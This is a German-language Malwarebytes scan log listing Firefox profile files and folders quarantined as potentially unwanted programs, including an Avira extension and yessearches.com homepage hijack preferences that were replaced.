PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\base, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\dnt-api, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\blocked, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\background, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\search, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\reports, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\unit, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\de, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\es, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\fr, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\it, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\pt_BR, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\minidumps, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\saved-telemetry-pings, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\sessionstore-backups, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb\2918063365piupsah.files, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\webapps, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],

Dateien: 195
PUP.Optional.WindowsProtectManager, C:\ProgramData\FwinpF\WFini.exe, In Quarantäne, [11945062475290a6ccadae8c17ee21df],
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (user_pref("browser.newtab.url", "hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffseng");), Ersetzt,[8520ddd57029bb7b95b33340d62ffa06]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (p.update.lastUpdateTime.browser-cleanup-thumbnails", 1445874268);
user_pref("app.update.lastUpdateTime.experiments-update-timer", 1445874508);
user_pref("app.update.), Ersetzt,[267f0ca63762a78f1a2edd9620e527d9]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (hile the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_), Ersetzt,[1293b5fd2a6f95a1cc7c6112a5604ab6]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (nning,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref("accessibility.typeahe), Ersetzt,[c8dddbd7c5d470c66adeb5be8283966a]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (), Schlecht: (ref("app.update.lastUpdateTime.addon-background-update-timer", 1445874628);
user_pref("app.update.lastUpdateTime.background-update-timer", 1445874868);
user), Ersetzt,[4d58337f5b3ee94d2a1ec1b2f411f709]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, Gut: (user_pref("browser.startup.homepage", "https://www.malwarebytes.org/restorebrowser/), Schlecht: (user_pref("browser.startup.homepage", "hxxp://www.yessearches.com), Ersetzt,[1293cce6019881b51949d69d37ce7e82]
PUP.Optional.YesSearches, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins\DD1B66D4.xml, In Quarantäne, [0b9a0ea42376f73f06261161ce377090],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\logins.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\absLocalStorage.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\addons.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\blocklist.xml, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\cert8.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\compatibility.ini, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\content-prefs.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\DCYoabp08X_ff.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions.ini, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\formhistory.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\key3.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\mimeTypes.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\parent.lock, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\permissions.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\places.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\pluginreg.dat, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\revocations.txt, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\search-metadata.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\secmod.db, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\SiteSecurityServiceState.txt, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\times.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\xulstore.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\bookmarkbackups\bookmarks-2015-08-02_14_vyI8dWcKHj7dD5pvymndCA==.jsonlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes\store.json.mozlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\state.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived\2015-10\1445874084771.eb83a39e-2542-4b9b-8f15-92b074184ca6.crash.jsonlz4, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\bootstrap.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\install.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\manifest.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\update.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\app.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\blocked.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\content.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\search.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\base\search.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\ask.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\duckduckgo.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines\google.css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Bold.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Bold.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Light.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro-Light.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro.eot, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts\KievitWebPro.woff, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_diagonals-thick_18_b81900_40x40.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_diagonals-thick_20_666666_40x40.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_flat_10_000000_40x100.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_100_f6f6f6_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_100_fdf5ce_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images\ui-bg_glass_65_ffffff_1x400.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
